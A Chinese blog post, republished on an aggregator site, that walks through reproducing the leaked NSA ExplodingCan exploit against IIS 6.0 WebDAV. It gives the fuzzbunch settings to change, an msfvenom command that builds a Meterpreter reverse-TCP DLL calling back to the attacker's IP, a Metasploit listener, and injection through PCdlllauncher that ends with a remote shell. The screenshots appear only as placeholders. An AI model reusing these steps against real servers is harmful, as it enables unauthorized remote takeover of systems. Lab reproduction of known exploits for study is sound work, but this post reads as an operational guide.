码迷,mamicode.com
首页 > 其他好文 > 详细

explodingcan复现

时间:2017-06-24 18:41:28      阅读:303      评论:0      收藏:0      [点我收藏+]

标签:下一步   callback   win   一个   针对   perm   9.png   工具包   llb   

使用NSA工具包针对iis 6.0 webDAV漏洞的工具(explodingcan)
工具的使用就不说了,直接默认选下一直往下,修改下图中的几个地方:
技术分享 
技术分享 
技术分享 
这里输入本机(运行NSA工具包的电脑)外网ip
技术分享 
这里的CallbackIP随意
技术分享 
成功

下一步使用msfvenom生成一个反弹dll:
命令为:msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地IP LPORT=未被占用的端口(我这里是12399) -f dll > c:\12399.dll
(我是在windows安装的metasploit,msf与fb.py运行在同一个电脑)
接下来使用msf开启监听
技术分享 
设置如上图。
开启监听之后,这边fb使用PCdlllancher脚本进行下一步
一路默认,修改一下几个地方
技术分享 
技术分享 

然后在msf接收到shell
技术分享 

explodingcan复现

标签:下一步   callback   win   一个   针对   perm   9.png   工具包   llb   

原文地址:http://www.cnblogs.com/websecyw/p/7073776.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!